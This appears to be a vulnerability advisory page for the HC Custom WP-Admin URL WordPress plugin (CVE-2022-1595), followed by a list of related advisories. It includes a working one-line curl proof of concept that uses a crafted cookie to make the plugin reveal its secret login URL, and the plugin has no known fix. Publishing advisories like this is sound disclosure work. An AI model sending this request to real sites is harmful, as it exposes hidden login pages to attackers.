WordPress Plugin Vulnerabilities

HC Custom WP-Admin URL <= 1.4 - Unauthenticated Secret URL Disclosure

Description

The plugin leaks the secret login URL when sending a specific crafted request

Proof of Concept

curl -sIXGET -H "Cookie: valid_login_slug=1" https://example.com/wp-login.php

HTTP/2 302 
x-redirect-by: WordPress
location: secret

Affects Plugins

Plugin icon
hc-custom-wp-admin-url
No known fix

References

CVE
CVE-2022-1595

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
0218c90c-8f79-4f37-9a6f-60cf2f47d47b

Timeline

Publicly Published
2022-05-18 (about 2 years ago)
Added
2022-05-18 (about 2 years ago)
Last Updated
2023-02-10 (about 1 years ago)

Other

Published
Title
Published
2020-03-04
Title
WooCommerce Smart Coupons < 4.6.5 - Unauthenticated Coupon Creation
Published
2022-12-27
Title
WP Limit Login Attempts <= 2.6.5 - IP Spoofing
Published
2017-11-29
Title
WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
Published
2018-10-02
Title
Wordfence < 7.1.14 - Username Enumeration Prevention Bypass
Published
2021-01-20
Title
123ContactForm for WordPress <= 1.5.6 - Unauthenticated Arbitrary Post Creation